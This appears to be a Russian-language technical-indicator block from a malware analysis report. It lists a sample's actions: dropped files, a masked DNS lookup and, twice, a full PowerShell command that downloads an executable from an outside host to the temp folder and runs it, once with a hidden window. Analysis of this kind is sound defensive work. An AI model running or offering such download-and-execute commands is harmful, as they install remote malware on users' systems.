Техническая информация
- http://wavecare.jpn.com/logo.exe как %temp%\melkashka.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://wavecare.jpn.com/logo.exe','%TEMP%\melkashka.exe');Start-Process '%TEMP%\melkashka.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1536
- %TEMP%\954944.cvr
- DNS ASK wa####re.jpn.com
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://wavecare.jpn.com/logo.exe','%TEMP%\melkashka.exe');Start-Process '%TEMP%\melkashka.exe';' (со скрытым окном)